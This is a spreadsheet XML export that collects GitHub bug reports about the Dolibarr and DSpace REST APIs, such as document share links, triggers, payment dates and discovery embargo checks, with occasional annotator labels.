    <t xml:space="preserve"> Bug Hi, I use API to retrive share link of my invoices. After some tests it seemed OK but I don't know why, GET /documents returned content is not consistent. Exampel using API explorer : GET api/index.php/documents?modulepart=invoice&amp;id=226  [ { "name": "FA2403-0183.pdf", "path": "/var/lib/dolibarr/documents/facture/FA2403-0183", "level1name": "FA2403-0183", "relativename": "FA2403-0183.pdf", "fullname": "/var/lib/dolibarr/documents/facture/FA2403-0183/FA2403-0183.pdf", "date": 1710515325, "size": 67051, "type": "file", "label": "XXXXXXXXXX", "entity": "1", "filename": "FA2403-0183.pdf", "filepath": "facture/FA2403-0183", "fullpath_orig": "", "description": "", "keywords": "", "cover": null, "position": "1", "gen_or_uploaded": "generated", "extraparams": null, "date_c": 1710515325, "date_m": 1710515325, "fk_user_c": "1", "fk_user_m": null, "acl": null, "src_object_type": "facture", "src_object_id": "226", "id": "682", "ref": "682", "share": "XXXXXXXXXXXX" } ]  GET api/index.php/documents?modulepart=invoice&amp;id=251  [ { "name": "FA2404-0204.pdf", "path": "/var/lib/dolibarr/documents/facture/FA2404-0204", "level1name": "FA2404-0204", "relativename": "FA2404-0204.pdf", "fullname": "/var/lib/dolibarr/documents/facture/FA2404-0204/FA2404-0204.pdf", "date": 1713257786, "size": 67550, "type": "file" } ]  Both in webUI have a share link for example. I can't get what could lead to this difference of behaviour  Regards  Dolibarr Version 18.0.4  Environment PHP 7.4  Environment Database MariaDB  Steps to reproduce the behavior and expected behavior _No response_  Attached files _No response_ ## EDIT Ok I'm close from a solution :) I found the problem but don't know exactly how to solve it  And maybe there are two bugs in one So in /htdocs/api/class/api_documents.class.php there is the main function, which call for fetchAll() of htdocs/ecm/class/ecmfiles.class.php The problem here is that the SQL built use "LIKE" in WHERE condition. In my case, I'm looking for an invoice. But if the src_object_id exists for different objects, multiple lines are return. So maybe it's the bug n1 because "LIKE %facture%" also returns "facture_fourn" type for example. So if multiple lines are returned by fetchAll() , this code is invloved :  $result = $ecmfile-&gt;fetchAll('', '', 0, 0, array('t.src_object_type' =&gt; $objectType, 't.src_object_id' =&gt; $object-&gt;id)); if ($result &lt; 0) { throw new RestException(503, 'Error when retrieve ecm list : '.$this-&gt;db-&gt;lasterror()); } elseif (is_array($ecmfile-&gt;lines) &amp;&amp; count($ecmfile-&gt;lines) &gt; 0) { $count = count($filearray); for ($i = 0 ; $i &lt; $count ; $i++) { if ($filearray[$i]['name'] == $ecmfile-&gt;lines[$i]-&gt;filename) { $filearray[$i] = array_merge($filearray[$i], (array) $ecmfile-&gt;lines[0]); } } }  And it seems not able to healthy manage this case because I debuged it, if ($filearray[$i]['name'] == $ecmfile-&gt;lines[$i]-&gt;filename) is never triggered (I'm still searching for a solution on this part). So it's bug n2 ## EDIT 2 Solved :)  if ($filearray[$i]['name'] == $ecmfile-&gt;lines[$i]-&gt;filename) { $filearray[$i] = array_merge($filearray[$i], (array) $ecmfile-&gt;lines[0]); }  Replaced by  foreach ($ecmfile-&gt;lines as $line) { if ($filearray[$i]['name'] == $line-&gt;filename) { $filearray[$i] = array_merge($filearray[$i], (array) $line); } }  Allows to scan all files returned in $ecmfiles for each file in $filearray, and merge them if filenames match</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/29594</t>
  </si>
  <si>
    <t>REST API PUT `/contacts/{id}`: `update` called with notrigger = 1</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug Currently, the API endpoint for contact update bypasses triggers (notrigger = 1). The same is true for some other PUT endpoints (~~thirdparty for instance~~), but not all (contract, BOM, proposal, anything made with ModuleBuilder, etc.). **[edit]** I was wrong about `thirdparty` because Societe::update's 3rd parameter is `$call_trigger` and not `$notrigger` as is usually the case. So the 3rd parameter is `1` but it _does_ call the trigger. If the endpoint `PUT /contacts/{id}` was copy-pasted from the third party API, it could explain this issue because this detail is easy to overlook (I'm a good example of that). I assume this is on purpose, but I can't find the reason why, and it is inconsinstent (why notrigger for updating and not for creating, why some objects and not others). We are developing a feature using triggers to change information whenever a contact is created or updated, but because of this `notrigger`, we can't make it work in APIs.  Dolibarr Version 17.0, 18.0, 19.0, develop,   Environment PHP any  Environment Database _No response_  Steps to reproduce the behavior and expected behavior 1. Implement triggers CONTACT_MODIFY and CONTACT_CREATE (let's say they both do the same: they concatenate "elloworld" to the lastname of the contact) 2. create a contact with lastname "h" using Dolibarr interface OK, its name is "helloworld" 3. edit the contact with lastname "h" using Dolibarr interface  OK, its name is "helloworld" 4. create a contact with lastname "h" using Dolibarr API POST /contacts  OK, its name is "helloworld" 5. update a contact with lastname "h"using Dolibarr API PUT /contacts/{id}  KO (its is still "h")  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/29797</t>
  </si>
  <si>
    <t>Webhook targets are active, even if they are deactivated</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug Everything is in the title :)  Dolibarr Version 19.0.2  Environment PHP PHP8.2  Environment Database MariaDB  Steps to reproduce the behavior and expected behavior Create a target Activate it Webhook works Deactivate the target Webhook still works  Attached files _No response_</t>
  </si>
  <si>
    <t>? - no bug</t>
  </si>
  <si>
    <t xml:space="preserve">not sure becase , here tharget is getting acticated sucessfully , but not deactivated sucessfully , but it not mention wethor the used api or not for this process </t>
  </si>
  <si>
    <t>this is why I assigned no bug</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/30161</t>
  </si>
  <si>
    <t>Ticket API endpoints are not working - getByRef and getByTrackID</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug API Endpoints for the ticket module `getByRef` and `getByTrackId` are not working at all. They always returns a specimen ticket even when provided a known ref or track_id. The problem lies in the `api_tickets.class.php` file, in the `getCommon` function and its calls: php private function getCommon($id = 0, $track_id = '', $ref = '') { if (!DolibarrApiAccess::$user-&gt;hasRight('ticket', 'read')) { throw new RestException(403); } if (($id &lt; 0) &amp;&amp; !$track_id &amp;&amp; !$ref) { throw new RestException(400, 'Wrong parameters'); } if ($id == 0) { $result = $this-&gt;ticket-&gt;initAsSpecimen(); } else { $result = $this-&gt;ticket-&gt;fetch($id, $ref, $track_id); } if (!$result) { throw new RestException(404, 'Ticket not found'); }  php public function getByRef($ref) { return $this-&gt;getCommon(0, '', $ref); } public function getByTrackId($track_id) { return $this-&gt;getCommon(0, $track_id, ''); }  Since `id` is always 0, the condition `id == 0` is always true in these cases and never try to fetch the ticket with the provided property. The condition should check for the lack of ref and track_id in order to return a specimen ticket. diff -if ($id == 0) { +if ($id == 0 &amp;&amp; empty($ref) &amp;&amp; empty($track_id)) {   Dolibarr Version 19.0.2  Environment PHP _No response_  Environment Database _No response_  Steps to reproduce the behavior and expected behavior 1. With the ticket module and API module enabled 2. Create one or more tickets 3. Open the API Explorer 4. Try the endpoints with - An existing ref - An non existing ref  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/30432</t>
  </si>
  <si>
    <t>Unable to modify client_code through thirdparties rest API</t>
  </si>
  <si>
    <t>Hello, I am currently trying to modify a client_code through the Thirdparties Rest API. I have adjusted Dolibarr's Thirdparties configuration to allow custom client codes (via the Leopard Module). However, it appears that modifying the client code through the API is not allowed. Could you please explain the reasoning behind this restriction? Additionally, is there any solution to bypass this issue without having to manually modify every code? After some investigation, it seems the issue originates from the following line: https://github.com/Dolibarr/dolibarr/blame/1b5eb2de22ccee5377549a219d0448f1e3026117/htdocs/societe/class/api_thirdparties.class.php#L299 **Steps to Reproduce:** - Execute the following CURL command : curl -X PUT --header 'Content-Type: application/json' --header 'Accept: application/json' --header 'DOLAPIKEY: key' -d '{ "code_client" : "new code" }' 'https://dolibarr-server.fr/api/index.php/thirdparties/id' - Attempt to modify the client code via the API, the Swagger UI, or the above CURL command - Observe that the API returns a 200 code without modifying the client. **Expected Behavior:** I expected to be able to update the client code through the API. **Actual Behavior:** The client code remains unchanged and the modification is blocked. Thank you very much for your assistance. Best regards, Lorenzo</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/30800</t>
  </si>
  <si>
    <t>WebHook Error in Make.com</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug When trying to establish a connection with Make, I encountered many issues because the JSON that Make.com was receiving was malformed. So, what I did was add the following variable to the `interface_95_modWebhook_WebhookTriggers.class.php` file: $headers = array( 'Content-Type: application/json', 'Accept: application/json' ); And the getURLContent method ended up as follows: $response = getURLContent($tmpobject-&gt;url, 'POST', $jsonstr, 1, $headers, array('http', 'https'), 0, -1);  Dolibarr Version 19.03  Environment PHP 7.4  Environment Database MariaDB  Steps to reproduce the behavior and expected behavior Create a webhook in Make.com, copy the webhook link, and configure it in the Dolibarr WebHook module. Set the parameter as CREATE_COMPANY and wait to analyze the string that Make.com receives.  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/30828</t>
  </si>
  <si>
    <t>On Ticket creation, contract origin is printed twice if contract is preselected</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug To set a contract by default on ticket creation, we use GET parameter : - origin (object type) - originid (object id) In contract form file, we can see that we print contract selector only if $subelement is not "contract" ![Capture decran 2024-09-02 a 12 01 23](https://github.com/user-attachments/assets/e2f9dbb2-0d0c-40b0-a5d5-c48c730f61b8) $subelement comes from GET parameter "origin" ![Capture decran 2024-09-02 a 12 03 50](https://github.com/user-attachments/assets/65d94389-3e9a-4dc9-bb40-a9a0b47603be) The contract class name is "Contrat". If we pass as parameter contract origin, the contract will be shown twice. ![Capture decran 2024-09-02 a 12 11 15](https://github.com/user-attachments/assets/3d70c785-1707-4c7b-8e25-32e2d63623a8) To avoid this error, we have to replace "contract" bye "contrat" in html.formticket.class.php line 701. The second problem is that this field does not link the ticket to the selected contract and/or no "contract" field exists on the ticket. ![Capture decran 2024-09-04 a 17 33 45](https://github.com/user-attachments/assets/31677662-05cd-4ae5-b50e-a1699ed0eefb) ![Capture decran 2024-09-04 a 17 34 22](https://github.com/user-attachments/assets/bc5dab1f-4fc0-4238-a0df-7101161eb7a9)  Dolibarr Version develop  Environment PHP 8.2.14  Environment Database 8.0.35-0ubuntu0.22.04.1  Steps to reproduce the behavior and expected behavior Go on ticket card with GET parameters : - action=create - origin=contrat - originid=x  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/30950</t>
  </si>
  <si>
    <t>Bad ref in supplier invoice created by Rest API from an invoice template</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug When a supplier invoice is created from the Rest API with an invoice template, Dolibarr always add `_1` at the end of the ref.  Dolibarr Version 19.0.1  Environment PHP _No response_  Environment Database _No response_  Steps to reproduce the behavior and expected behavior 1. Create an invoice template 2. Call the API with this body: json { "date": "1725235200", "fac_rec": 1, "ref_supplier": "my_ref", "socid": 1 }   Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/31015</t>
  </si>
  <si>
    <t>Can't add payment through API since upgrade to 20.0</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug Hello, Since upgrade to version 20.0, I can't add a payment to an invoice through the API. I'm getting this error: `{ "error": { "code": 400, "message": "Bad Request: Payment error : Incorrect datetime value: '' for column `dolibarr`.`llx_paiement`.`datep` at row 1" }, "debug": { "source": "api_invoices.class.php:1516 at call stage", "stages": { "success": [ "get", "route", "negotiate", "authenticate", "validate" ], "failure": [ "call", "message" ] } } }` The request has not changed since months: `CallDOAPI("POST", "/invoices/$facid/payments", json_encode(array("datepaye"=&gt;time(), "paymentid"=&gt;6, "closepaidinvoices"=&gt;"yes", "accountid"=&gt;5;` time() returns the expected value (tried with another value and I'm getting the "Bad Request: Invalid value specified for `datepaye`. Expecting unix timestamp, such as 1726652385" error). The function called is: `$paymentobj-&gt;datepaye = dol_stringtotime($datepaye);` In version 19.0.3, it was: `$paymentobj-&gt;datepaye = $datepaye;`  Dolibarr Version 20.0.0  Environment PHP 8.2.23  Environment Database MariaDB 10.11.6  Steps to reproduce the behavior and expected behavior See above  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/31369</t>
  </si>
  <si>
    <t>Bug: date_solde not taken when creating a bank account via API</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug Version: 20.0.1 Hello, I'm able to create a bank account via API but although initialising a solde value works, initialising a date_solde doesn't. This results in having the solde initial with the date of today, always. ![image](https://github.com/user-attachments/assets/b3b4cece-6d25-4c35-b275-ca908f722561) I looked at the code in `/htdocs/compta/bank/class/api_bankaccounts.class.php` And at line 172 I have `$account-&gt;date_solde = time();` I checked that hardcoding setting $account-&gt;date_solde to some value have the desired effect. So the problem is that instead of retrieving date_solde from the API call, it always set $account-&gt;date_solde to the date of right now I replaced `$account-&gt;date_solde = time();` by  if (isset($request_data['date_solde'])) { $account-&gt;date_solde = $this-&gt;_checkValForAPI('date_solde', $request_data['date_solde'], $account); } else { $account-&gt;date_solde = time(); }  Then it works properly  Dolibarr Version 20.0.1  Environment PHP _No response_  Environment Database _No response_  Steps to reproduce the behavior and expected behavior _No response_  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/31677</t>
  </si>
  <si>
    <t>Bug: API Missing Support BomLine DefaultWorkstationId</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug DefaultWorkstationId is not implemented in the API.  Dolibarr Version 20  Environment PHP _No response_  Environment Database _No response_  Steps to reproduce the behavior and expected behavior _No response_  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/32072</t>
  </si>
  <si>
    <t>PUT method doesn't change the value of the extra fields of the shipments module</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug When using the `PUT /shipments/{id}` method of the REST_API, the extra fields contained under array_options does not change after a successfull API call.  Dolibarr Version 20.0.2  Environment PHP 8.2.24  Environment Database MySQL or MariaDB 10.9.8-MariaDB-1:10.9.8+maria~deb11  Steps to reproduce the behavior and expected behavior Request body: ![image](https://github.com/user-attachments/assets/69469a27-7e3a-41d3-9e8e-824c4655a549) Response body: ![image](https://github.com/user-attachments/assets/2ed921df-87c9-4b7a-9f3b-ca9be14a6e84) If I try to update a normal field, it works: Request body: ![image](https://github.com/user-attachments/assets/4fc06e53-18bb-43da-bc15-cc43a4f7056b) Response body: ![image](https://github.com/user-attachments/assets/0f7dafe7-db70-48c7-aedc-36de0ce8e36a) If I use the `PUT /products/{id}` method, that also works fine: Request body: ![image](https://github.com/user-attachments/assets/6d8b0be0-af9e-4d3d-838a-59d93290b5d5) Response body: ![image](https://github.com/user-attachments/assets/080dd026-b50d-4966-9acc-b262af22a16f) It looks like the products API handle the array_options: https://github.com/Dolibarr/dolibarr/blob/develop/htdocs/product/class/api_products.class.php#L397 But the shipment API does not: https://github.com/Dolibarr/dolibarr/blob/develop/htdocs/expedition/class/api_shipments.class.php#L486  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/32096</t>
  </si>
  <si>
    <t>linkedObjectsIds is null when doing a search</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug The API return null for the `linkedObjectsIds` field when doing a search, but when querying the order directly, it returns the references correctly.  Dolibarr Version 20.0.2  Environment PHP 8.2.24  Environment Database MySQL or MariaDB 10.9.8-MariaDB-1:10.9.8+maria~deb11  Steps to reproduce the behavior and expected behavior Result of: `GET http://dolibarr_ip/dolibarr/api/index.php/orders?sqlfilters=ref:like:SO2411-0003` json [ { "module": null, "id": "5", "entity": "1", "import_key": null, "array_options": [], "array_languages": null, "contacts_ids": [], "linkedObjectsIds": null, "canvas": null, "fk_project": null, "contact_id": null, "user": null, "origin_type": null, "origin_id": null, "ref": "SO2411-0003" } ]  Result of: `GET http://dolibarr_ip/dolibarr/api/index.php/orders/5` json { "module": null, "id": "5", "entity": "1", "import_key": null, "array_options": [], "array_languages": null, "contacts_ids": [], "linkedObjectsIds": { "shipping": { "3": "3" } }, "canvas": null, "fk_project": null, "contact_id": null, "user": null, "origin_type": null, "origin_id": null, "ref": "SO2411-0003" } ]   Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/32111</t>
  </si>
  <si>
    <t>Impossible to set the date of a payment using API</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug At `htdocs/compta/facture/class/api_invoices.class.php` you have: `$paymentobj-&gt;datepaye = dol_stringtotime($datepaye);` So the code expects a date string: 2024/11/26 (instead timestamp) but if I try to give a date string I get a response (from DOLIBARR API): Message: Bad Request: Invalid value specified for `datepaye`. Expecting unix timestamp, such as 1732638616 It is not possible to workaround this in my code, so I patched the code to be: `$paymentobj-&gt;datepaye = (int) $datepaye;` I don't know/have not checked if other part code of the code is sending date string instead of a timestamp Whatever is the write way to fix this (date string or timestamp), I will use it when this is addressed in a future release, thanks  Dolibarr Version 20.0.1  Environment PHP 8.2  Environment Database _No response_  Steps to reproduce the behavior and expected behavior Use API to created/update a payment  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/32145</t>
  </si>
  <si>
    <t>Ticket module - Condition validation is wrong</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug In the ticket/card.php file there is a condition that is evaluated incorrectly because the "private_message" parameter is compared to an unexpected value. `if ($action == 'add_message' &amp;&amp; GETPOSTISSET('btn_add_message') &amp;&amp; $permissiontoread) {` `$ret = $object-&gt;newMessage($user, $action, (GETPOST('private_message', 'alpha') == "on" ? 1 : 0), 0);` GETPOST('private_message', 'alpha') is always "1" or "0", never is "on" This violates the scenario that if a comment is marked private, the status should not change.  Dolibarr Version 20.0.2  Environment PHP 8.0  Environment Database MySQL  Steps to reproduce the behavior and expected behavior **Behavior** Add a new message in ticket card and mark it as private. The status changes to "IN PROGRESS" **Expected** The status does not change. The same state is maintained.  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/33689</t>
  </si>
  <si>
    <t>API &gt; supplierorders &gt; post lines not working</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug @mdeweerd : in commit 035ede5 the function post() in api_supplier_order.class.php has been modified at the beginning `// Check mandatory fields` `$request_data = $this-&gt;_validate($request_data);` where we previously we had `$result = $this-&gt;_validate($request_data);` this breaks the function to import lines order for me  Dolibarr Version develop  Environment PHP _No response_  Environment Database _No response_  Steps to reproduce the behavior and expected behavior _No response_  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/Dolibarr/dolibarr/issues/33949</t>
  </si>
  <si>
    <t>BUG: default value not changed when updating an extrafield using the API</t>
  </si>
  <si>
    <t xml:space="preserve"> Bug BUG: the default value is not changed when updating an extrafield Did a PUT to this API endpoint `/api/index.php/setup/extrafields/projet/call_to_action` with these request_data  { "type": "varchar", "label": "Call_to_action", "size": "26", "default": "Begin Registration", "unique": "0", "required": "0", "pos": "160", "alwayseditable": "0", "list": "1", "printable": "0", "totalizable": "0" }  But if you then do a GET to this API endpoint `http://localhost:22180/api/index.php/setup/extrafields/projet/call_to_action` and I get this reply where the default value is null  { "projet": { "call_to_action": { "id": "521", "type": "varchar", "label": "Call_to_action", "size": "26", "elementtype": "projet", "default": null, "computed": null, "unique": "0", "required": "0", "param": "", "pos": "160", "alwayseditable": "0", "perms": null, "list": "1", "printable": "0", "totalizable": "0", "langs": null, "help": null, "css": null, "cssview": null, "csslist": null, "fk_user_author": "2", "fk_user_modif": "2", "datec": "2025-04-22 18:38:09", "tms": "2025-04-22 18:38:09" } } }   Dolibarr Version 22.0.0-alpha  Environment PHP official docker devel image version  Environment Database mariadb latest  Steps to reproduce the behavior and expected behavior _No response_  Attached files _No response_</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/2826</t>
  </si>
  <si>
    <t>POSTing item returns null as 'name'</t>
  </si>
  <si>
    <t>When using the REST API and POSTing to `collections/{collectionId}/items` the field `name` of the Item is ignored. So the command: `curl -X POST https://demo.dspace.org/rest/collections/{collection id}/items -H 'Content-Type: application/json' -H 'Accept: application/json' -d '{"name": "TEST"}'` returns `{ "uuid": "someuuid", "name": null,  }` Please correct me if I am wrong but the code in `rest/CollectionsResource.java` suggests that only the metadata, but not the name, of an Item is considered. As [` if (item.getMetadata() != null) {`](https://github.com/DSpace/DSpace/blob/master/dspace-rest/src/main/java/org/dspace/rest/CollectionsResource.java#L356) is the only time when Item is accessed. Do I miss something?</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/2962</t>
  </si>
  <si>
    <t>CORS policy issue when retrieving bitstream through Angular</t>
  </si>
  <si>
    <t>**Describe the bug** During the implementation of the Angular counterpart of the [scripts and processes output](https://github.com/DSpace/DSpace/pull/2934), @MarieVerdonck noticed the following error when retrieving the output bitstream through a GET call of the relevant `process._links.output.href` link &gt;Access to XMLHttpRequest at 'http://localhost:8080/server/api/core/bitstreams/fd4bf164-a876-486d-95a6-d9f24cb23700/content?authentication-token=eyJhbGciOiJIUzI1NiJ9.eyJlaWQiOiJjZDgyNGE2MS05NWJlLTRlMTYtYmNjZC01MWZlYTI2NzA3ZDAiLCJzZyI6W10sImV4cCI6MTU5OTcyNzMzOH0.s3EVCgQjjw1dLq2auJnDCzhb6ze59LxDYgEeX6tHHw0' from origin 'http://localhost:4000' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. This LOOKS to be CORS related at a first glance, but might need additional investigation as well. **Request**  curl --location --request GET 'http://localhost:8080/server/api/core/bitstreams/fd4bf164-a876-486d-95a6-d9f24cb23700/content' \ --header 'Authorization: Bearer {{currentAccessToken}}'  **Response headers:** ![Screenshot 2020-09-10 at 11 31 53](https://user-images.githubusercontent.com/11884252/92738652-6b4e2880-f37c-11ea-9abc-d5be9ff5b2ac.png) This might be solvable if the CORS headers are properly set through the REST Api, it might also have another underlying issue that is not readily apparent. **To Reproduce** Steps to reproduce the behaviour: 1. Setup [REST PR](https://github.com/DSpace/DSpace/pull/2934) 2. Setup [Angular PR](https://github.com/DSpace/dspace-angular/pull/827) 3. Make sure to trigger a script that keeps output in a file. 4. Try to download that particular output bitstream **Expected behaviour** The bitstream should be properly 'downloaded', no CORS error should be logged, and the information of the logs should be shown in the UI **Related work** https://github.com/DSpace/DSpace/pull/2934 https://github.com/DSpace/dspace-angular/pull/827</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/3032</t>
  </si>
  <si>
    <t>pagination for eperson/groups/search/byMetadata method doesn't work properly</t>
  </si>
  <si>
    <t>**Describe the bug** If I make a request to `api/eperson/groups/search/byMetadata` the pagination works properly only for the first page. Indeed if I make a request for a page after the first I get a number of results which are twice as many as required **To Reproduce** It can be verified directly on the demo server: 1. login as admin through hal browser https://dspace7.4science.cloud/server 2. make a new request for the first page, and verify the server return 10 results : https://dspace7.4science.cloud/server/#https://dspace7.4science.cloud/server/api/eperson/groups/search/byMetadata?page=0&amp;size=10&amp;query= 3. make a new request for the second page, and verify the server return 20 results instead of 10 : https://dspace7.4science.cloud/server/#https://dspace7.4science.cloud/server/api/eperson/groups/search/byMetadata?page=1&amp;size=10&amp;query= **Expected behavior** It should return the exact number of results for every page requested</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/3090</t>
  </si>
  <si>
    <t>Bitstream format cannot be retrieved if you don't have read rights on the file</t>
  </si>
  <si>
    <t>**Describe the bug** When you make a file private (or add an embargo to it) and you aren't logged in (or if you are logged in but without read rights to the file) the format of the file isn't displayed on the full item view page. This is because the format endpoint doesn't allow you to retrieve the format if you don't have read rights to the file. The url that is being used for that request is: &gt; /server/api/core/bitstreams/{id}/format **To Reproduce** Steps to reproduce the behavior: 1. Upload a file to an item 2. Add an embargo to it, or make it admin only by removing the anonymous read rights 3. Go to the full item view page &amp; the format won't be there **Expected behavior** The format should be able to be displayed even if you don't have read rights to the actual file.</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/3110</t>
  </si>
  <si>
    <t>Poor URL matching causes improper failure with confusing message</t>
  </si>
  <si>
    <t>**400 Bad Request** while rendering the initial page server-side. The underlying error made no sense: `java.lang.IllegalArgumentException: the supplied uri is not valid: http://ds7.wood.net/server/api/core/sites/2510e895-db7e-46b2-9a9e-b4fd92026156`. The string *is* a valid HTTP URI, and fetching it with `curl` succeeds. I traced the problem to the way that URIs are validated in `org.dspace.app.rest.utils.Utils.getBaseObjectRestFromUri`. The problem was revealed because I had configured `dspace.server.url` with an explicit port 80, which is useless (for protocol `http`) but not incorrect. This failure is incorrect, surprising, and time-consuming to understand. The ultimate cause of the failure is that `getBaseObjectRestFromUri` compares URLs as strings rather than as serializations of complex structured objects (which is what URLs are). I suggest that, to discover whether URL A is a prefix of URL B, one must compare protocol, host, port, and path separately. **To Reproduce** Steps to reproduce the behavior: 1. Configure `dspace.server.url` explicitly with the default port for its protocol. 2. Start up front end and back end, and browse to the front end. **Expected behavior** For example: the URL `http://example.com:80/foo` should be recognized as a prefix of `http://example.com/foo/bar`.</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/3116</t>
  </si>
  <si>
    <t>Security issue in discovery</t>
  </si>
  <si>
    <t>**Describe the bug** Items under embargo (not the bitstreams) are exposed via Discovery. There's even an IT proving it's broken. The [item](https://github.com/DSpace/DSpace/blob/main/dspace-server-webapp/src/test/java/org/dspace/app/rest/DiscoveryRestControllerIT.java#L1927) has an [embargo period of 12 months](https://github.com/DSpace/DSpace/blob/main/dspace-server-webapp/src/test/java/org/dspace/app/rest/DiscoveryRestControllerIT.java#L1933), but is [accessible via discovery](https://github.com/DSpace/DSpace/blob/main/dspace-server-webapp/src/test/java/org/dspace/app/rest/DiscoveryRestControllerIT.java#L1959) as an [anonymous user](https://github.com/DSpace/DSpace/blob/main/dspace-server-webapp/src/test/java/org/dspace/app/rest/DiscoveryRestControllerIT.java#L1941). This implies there are security bugs: * The [SolrServiceResourceRestrictionPlugin](https://github.com/DSpace/DSpace/blob/main/dspace-api/src/main/java/org/dspace/discovery/SolrServiceResourceRestrictionPlugin.java) doesn't check for dates on permissions, causing the embargoed items to be returned * Discovery ignores the [PreAuthorize permissions check](https://github.com/DSpace/DSpace/blob/main/dspace-server-webapp/src/main/java/org/dspace/app/rest/converter/ConverterService.java#L122) which should ensure the item cannot be returned, not even when it's embedded The issue doesn't occur on the item REST endpoint. An [embargo of 6 months](https://github.com/DSpace/DSpace/blob/main/dspace-server-webapp/src/test/java/org/dspace/app/rest/ItemRestRepositoryIT.java#L1353) is resulting in an [unauthorized](https://github.com/DSpace/DSpace/blob/main/dspace-server-webapp/src/test/java/org/dspace/app/rest/ItemRestRepositoryIT.java#L1379) response.</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/3130</t>
  </si>
  <si>
    <t>Group2group cache is not updated by the REST endpoint</t>
  </si>
  <si>
    <t>**Describe the bug** The `org.dspace.app.rest.GroupRestController` doesn't call the update method of the group service that is responsible from the other things to rethink the group cache. This imply that if an user is member of the childGroup that is added as children to the parentGroup the subsequent calls to `GroupService.allMemberGroups(Context, EPerson)` would fail to get the parentGroup **To Reproduce** Steps to reproduce the behavior: 1. login as admin 2. create a "children group" 3. add the children group as member of a collection/community admin group 4. add a normal user to the children group 5. login with such user 6. verify that such user is not seen as administrator of the community/collection, this because it is an indirect member of the admin group. Alternatively you can check the content of the group2groupcache table This bugs also invalidate several scenario related to the security, discovery and workflow if the involved user get rights/tasks due to his membership to a sub-group **Expected behavior** The group2groupcache table is updated when a group is added or removed as a member of another group via the REST endpoints</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/3184</t>
  </si>
  <si>
    <t>workflow discovery configuration query with query parameter set with free text returns no results</t>
  </si>
  <si>
    <t>**Describe the bug** If a discovery search with configuration param set as "workflow" and a query param does not return any result. **To Reproduce** Steps to reproduce the behavior: 1. login on dspace 7 demo 2. go to "MyDSpace" 3. select "all tasks" 4. enter a query string in search input box (i.e. title of an item that appears among "all tasks") 5. Search won't return results The same search can be made against REST api as logged in user, by calling /server/api/discover/search/objects?configuration=workflow&amp;query=&lt;query parameter&gt; **Expected behavior** Results according to query content should be returned **Related work** We (4Science) can take this in charge, right after other beta5 tasks that we already have in charge. our estimation is 4 hours of work. Work that consists in the item indexing into task's solr documents (PooledTask and ClaimedTask resource types) and the creation of a specific test that proves the provided solution. ![Screenshot from 2021-03-12 15-17-16](https://user-images.githubusercontent.com/70699836/110952059-0e8cf400-8346-11eb-93ca-5366f572c08f.png) ![Screenshot from 2021-03-12 15-16-34](https://user-images.githubusercontent.com/70699836/110952063-0f258a80-8346-11eb-9b8b-ac90f0b96900.png)</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/3185</t>
  </si>
  <si>
    <t>Facet entries in the discover/facets/{facet} endpoint does not return the authority key</t>
  </si>
  <si>
    <t>**Describe the bug** When calling the {dspace.url}/api/discover/facets/{facet} endpoint, the results won't include the authority key, even though it should be there. **To Reproduce** 1. Set up a discovery core that has authority values for facets in the config 2. Try to retrieve the values through the call above 3. The resulting facet entries won't include the authority key **Expected behavior** The authority keys should be present in the response **Related work** This was discovered due to the failing tests in this PR: https://github.com/DSpace/DSpace/pull/3176</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/3207</t>
  </si>
  <si>
    <t>LDAP Authentication does not work properly without the authentication-ldap.login.groupmap option</t>
  </si>
  <si>
